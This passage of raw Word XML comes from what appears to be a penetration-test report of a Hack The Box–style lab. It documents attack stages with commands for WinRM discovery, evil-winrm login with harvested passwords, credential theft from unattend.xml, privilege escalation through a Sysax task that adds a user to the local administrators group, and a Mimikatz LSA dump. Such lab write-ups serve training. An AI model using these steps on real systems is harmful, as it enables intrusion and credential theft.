          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>qazXSW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>@.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28FE87" w14:textId="2DB3B0F1" w:rsidR="00AE36D8" w:rsidRDefault="00AE36D8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6197E0DF" wp14:editId="6F7A404C">
            <wp:extent cx="5943600" cy="24445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z06.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2444593"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5889C101" w14:textId="4FA9110C" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00AE36D8" w:rsidP="00C36AFA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E312738" wp14:editId="1D2C0869">
            <wp:extent cx="5943600" cy="11076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z05.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1107682"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE297E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 4: SMB Share Spidering and Extraction of Cleartext Credentials from Backup Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A905B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.5 Stage 5: WinRM Host Discovery &amp; Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6890B4C5" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>With newly harvested service account credentials (backupadm), network scanning identified that WinRM (Port 5985) was active on member server MS01 (172.16.8.50). Using evil-winrm, an interactive PowerShell session was established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273CEDF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="1B9C25CE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FD40AAA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>nmap -sT -Pn -p5985 172.16.8.0/24 -oG - | grep open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04AA0ACE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nxc winrm 172.16.8.50 -u backupadm -p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>'!qazXSW</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@' -d inlanefreight.local</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6D3BCF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">evil-winrm -i 172.16.8.50 -u backupadm -p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>'!qazXSW</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50630CC1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02ED1571" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 5 demonstrates successful lateral movement onto member server MS01 as INLANEFREIGHT\backupadm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C54E9" w14:textId="33429476" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E278B2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A83C83" wp14:editId="387CF252">
            <wp:extent cx="5943600" cy="226866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z07.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2268661"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3245B6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 5: Evil-WinRM Remote Interactive Shell Established on MS01 as backupadm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA94A81" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.6 Stage 6: Leftover Deployment Artifact Credential Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C2C94" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>While enumerating the file system of MS01, an uncleaned Windows unattended installation file (unattend.xml) was discovered in C:\panther\. Inspecting the XML content exposed plain-text local administrator setup credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366EB07" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="75B4662F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E534D66" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># From evil-winrm session on MS01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CCD2470" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>cd c:\panther</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FBA31F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64ADAC35" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>type unattend.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24C11FB9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEABF6C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>As illustrated in Figure 6, the deployment file contained plaintext credentials for account ilfserveradm (Sys26Admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EADEE5" w14:textId="77777777" w:rsidR="009935D5" w:rsidRDefault="00A16038">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="764F44B8" wp14:editId="16BA780A">
            <wp:extent cx="4781638" cy="2126593"/>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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4781638" cy="2126593"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D208D51" w14:textId="0A9BDFF1" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 6: Discovery of Plaintext Credentials for ilfserveradm in C:\panther\unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA2C9A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.7 Stage 7: Local Privilege Escalation on MS01 (Sysax Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDD10F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>RDP authentication as ilfserveradm enabled graphical access to MS01. Enumeration of running services revealed a vulnerable third-party application, Sysax Automation Software, running as a service under NT AUTHORITY\SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A005E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="55C371B0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="296D00C6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>xfreerdp /v:172.16.8.50 /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>u:ilfserveradm</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> /p:'Sys26Admin' /drive:home,"/home/issifu/htb"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45ED4AE6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5F2ADA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>By creating a custom triggered task within Sysax to execute pwn.bat (containing 'net localgroup administrators ilfserveradm /add'), local administrative rights were achieved on MS01 (see Figure 7 and Figure 8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFBCA1B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D151A0" wp14:editId="37075B8C">
            <wp:extent cx="5841483" cy="320357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ax-software.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5846881" cy="3206535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="728550A3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 7: Sysax Automation Service Interface Utilized for SYSTEM Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F736D74" w14:textId="75173026" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00AA25BA">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="159F0DEE" wp14:editId="5218B9A4">
            <wp:extent cx="5943600" cy="172847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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1728470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AFF3E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 8: Execution of Custom Batch Script Adding ilfserveradm to Local Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EA9FE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.8 Stage 8: LSA Secrets Dump on MS01 (Autologon Secrets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC3F28" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>With local Administrator privileges on MS01, Mimikatz was executed to extract LSA secrets from registry memory (HKLM\SECURITY). A domain service account, mssqladm, was configured for automatic logon, exposing its password in cleartext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF98C2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="728DAC2F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
